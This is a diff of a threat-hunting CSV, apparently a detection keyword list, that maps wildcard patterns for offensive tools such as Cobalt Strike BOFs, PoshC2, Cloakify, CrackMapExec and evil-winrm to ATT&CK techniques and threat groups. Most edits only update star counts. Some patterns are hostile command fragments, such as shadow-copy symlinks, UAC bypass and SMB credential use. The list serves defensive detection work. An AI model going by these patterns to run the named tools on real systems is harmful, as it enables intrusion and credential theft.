-"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*ClipboardWindow-Inject*","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","58","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z"
 "*clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","",""
 "*cloakify*","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1440","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z"
-"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z"
-"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
-"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z"
+"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
 "*cloudfail.py --target seo.com --tor*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*cloudmapper collect --account parent --profile parent*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*cloudmapper configure discover-organization-accounts*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -8497,88 +8645,88 @@
 "*cloudsplaining scan --input-file default.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
-"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
 "*clr2of8/GatherContacts*","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","169","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z"
-"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
+"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z"
 "*cmd /c * --bypass-uac*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*cmd /c * --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
-"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
-"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
 "*cmd /c whoami* bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z"
-"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
